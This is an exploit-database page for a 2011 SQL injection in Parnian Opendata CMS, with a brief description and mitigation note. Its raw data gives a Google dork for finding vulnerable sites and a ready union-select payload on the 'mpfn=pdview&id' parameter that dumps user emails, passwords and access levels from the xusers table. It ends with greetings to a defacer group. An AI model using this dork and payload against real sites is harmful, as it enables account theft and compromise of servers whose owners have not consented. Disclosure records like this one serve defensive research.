header-logo
Suggest Exploit
vendor:
Opendata CMS
by:
Alexander
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Opendata CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: Web Applications
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: php
2011

Parnian Opendata CMS SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The attacker can use the 'mpfn=pdview&id' parameter to inject malicious SQL code into the application. The attacker can use the 'union select' statement to extract data from the database. The attacker can also use the 'group_concat' statement to concatenate the data from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use parameterized queries.
Source

Exploit-DB raw data:

###########################################################################

Exploit Title : Parnian Opendata CMS SQL Injection Vulnerability

Date : 2011-04-15 

Author : *Alexander* 

Software Link : http://www.parniansoft.com/

Test On : php

CVE : Web Applications

Google Dork : inurl:mpfn=pdview

Exploit : mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers

Demo : http://server/index.php?mpfn=pdview&id=1'

http://server/index.php?mpfn=pdview&id=-1+union+select +1,2,3,4,5,group_concat(email,0x3a,password,0x3a,level),7,8,9,10,11,12,13,14,15,16+from+xusers

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers